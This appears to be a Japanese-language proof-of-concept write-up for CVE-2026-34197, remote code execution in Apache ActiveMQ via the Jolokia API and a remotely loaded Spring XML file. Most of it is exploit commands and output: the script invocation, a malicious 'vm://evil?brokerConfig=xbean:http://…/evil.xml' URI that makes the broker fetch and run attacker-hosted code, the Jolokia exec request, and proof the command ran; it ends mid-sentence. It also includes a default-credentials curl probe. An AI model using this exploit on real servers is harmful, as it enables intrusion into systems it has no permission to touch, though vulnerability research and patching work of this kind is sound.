
CVE-2026-34197の概念実証エクスプロイトで、Jolokia JMX-HTTPブリッジとSpring XML beanインジェクションを介したApache ActiveMQにおける認証済みリモートコード実行を実証します。
説明
Apache ActiveMQ Broker および Apache ActiveMQ における、不適切な入力検証、コード生成の制御の不備(コードインジェクション)の脆弱性。Apache ActiveMQ Classic は、Web コンソール上で Jolokia JMX-HTTP ブリッジを /api/jolokia/ に公開しています。デフォルトの Jolokia アクセスポリシーは、BrokerService.addNetworkConnector(String) や BrokerService.addConnector(String) を含む、すべての ActiveMQ MBean (org.apache.activemq:*) に対する exec 操作を許可しています。認証された攻撃者は、VM トランスポートの brokerConfig パラメータが ResourceXmlApplicationContext を使用してリモートの Spring XML アプリケーションコンテキストをロードするように仕組まれた discovery URI を使って、これらの操作を呼び出すことができます。Spring の ResourceXmlApplicationContext は、BrokerService が設定を検証する前にすべてのシングルトンビーンをインスタンス化するため、Runtime.exec() などの Bean ファクトリメソッドを介してブローカーの JVM 上で任意のコードが実行されます。この問題は、Apache ActiveMQ Broker: 5.19.4 未満、6.0.0 から 6.2.3 未満、Apache ActiveMQ All: 5.19.4 未満、6.0.0 から 6.2.3 未満、Apache ActiveMQ: 5.19.4 未満、6.0.0 から 6.2.3 未満に影響します。ユーザーは、この問題を修正したバージョン 5.19.4 または 6.2.3 にアップグレードすることを推奨します。
詳細はこちら: リンク
Github: リンク```bash ❯ docker compose up -d
入力:```bash
❯ python3 exploit_poc.py auto \
--target http://localhost:8161 \
--lhost 192.168.1.32 --lport 9999 \
--cmd "touch /tmp/blahblah.txt"
======================================================================
CVE-2026-34197 — ActiveMQ RCE via Jolokia + VM Transport
For authorized security testing and research only.
======================================================================
[*] Target: http://localhost:8161
[*] Command: touch /tmp/blahblah.txt
[*] Serving malicious Spring XML on http://0.0.0.0:9999/evil.xml
[+] Jolokia accessible — agent version: unknown
[*] Could not discover broker name, using default 'localhost'
[*] Sending exploit payload to http://localhost:8161/api/jolokia/
[*] Malicious URI: static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Jolokia returned 200 — exploit payload delivered
[+] Response: {
"request": {
"mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
"arguments": [
"static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"
],
"type": "exec",
"operation": "addNetworkConnector(java.lang.String)"
},
"value": "NC",
"timestamp": 1775616523,
"status": 200
}
[*] Waiting 5s for target to fetch payload...
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Done. Verify command execution on target.
LHOSTはコンピュータのプライベートIPです。Windowsではipconfig、Linuxではifconfigを使用できます。
RCEの確認```bash
❯ docker exec -it activemq-vuln ls -lah /tmp
total 16K
drwxrwxrwt 1 root root 4.0K May 18 04:01 .
drwxr-xr-x 1 root root 4.0K May 18 03:40 ..
-rw-r--r-- 1 root root 0 May 18 04:01 blahblah.txt
drwxr-xr-x 1 root root 4.0K May 18 04:06 hsperfdata_root
=> RCEが成功し、ターゲットシステム上にファイル`blahblah.txt`が作成されました。
# 分析フェーズ
## 動的解析```bash
❯ docker exec activemq-vuln java -version
openjdk version "11.0.24" 2024-07-16
OpenJDK Runtime Environment Temurin-11.0.24+8 (build 11.0.24+8)
OpenJDK 64-Bit Server VM Temurin-11.0.24+8 (build 11.0.24+8, mixed mode, sharing)
❯ docker exec activemq-vuln sh -c 'ls /opt/apache-activemq/lib | grep activemq'
activemq-broker-5.18.6.jar
activemq-client-5.18.6.jar
activemq-console-5.18.6.jar
activemq-jaas-5.18.6.jar
activemq-kahadb-store-5.18.6.jar
activemq-openwire-legacy-5.18.6.jar
activemq-protobuf-1.1.jar
activemq-rar.txt
activemq-spring-5.18.6.jar
activemq-web-5.18.6.jar
ランタイムログはまた、Jolokiaが有効であり、ActiveMQ Webコンソールを通じて公開されていることを確認しました:```bash INFO | ActiveMQ WebConsole available at http://0.0.0.0:8161/ INFO | ActiveMQ Jolokia REST API available at http://0.0.0.0:8161/api/jolokia/
接続を確認する```bash
❯ curl -i -u admin:admin \
-H 'Origin: http://localhost:8161' \
http://localhost:8161/api/jolokia/
HTTP/1.1 200 OK
Date: Mon, 18 May 2026 04:37:28 GMT
X-FRAME-OPTIONS: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Access-Control-Allow-Origin: http://localhost:8161
Access-Control-Allow-Credentials: true
Content-Type: text/plain;charset=utf-8
Pragma: no-cache
Expires: Mon, 18 May 2026 03:37:28 GMT
Transfer-Encoding: chunked
{"request":{"type":"version"},"value":{"agent":"1.7.1","protocol":"7.2","config":{"listenForHttpService":"true","authIgnoreCerts":"false","agentId":"172.21.0.2-42-aa61e4e-servlet","debug":"false","agentType":"servlet","policyLocation":"${prop:jolokia.conf}","agentContext":"\/jolokia","serializeException":"false","mimeType":"text\/plain","dispatcherClasses":"org.jolokia.http.Jsr160ProxyNotEnabledByDefaultAnymoreDispatcher","multicastGroup":"239.192.48.84","authMode":"basic","authMatch":"any","streaming":"true","canonicalNaming":"true","historyMaxEntries":"10","allowErrorDetails":"false","allowDnsReverseLookup":"true","realm":"jolokia","includeStackTrace":"true","multicastPort":"24884","useRestrictorService":"false","debugMaxEntries":"100"},"info":{"product":"activemq","vendor":"Apache","version":"5.18.6"}},"timestamp":1779079048,"status":200}
これは次のことを意味します: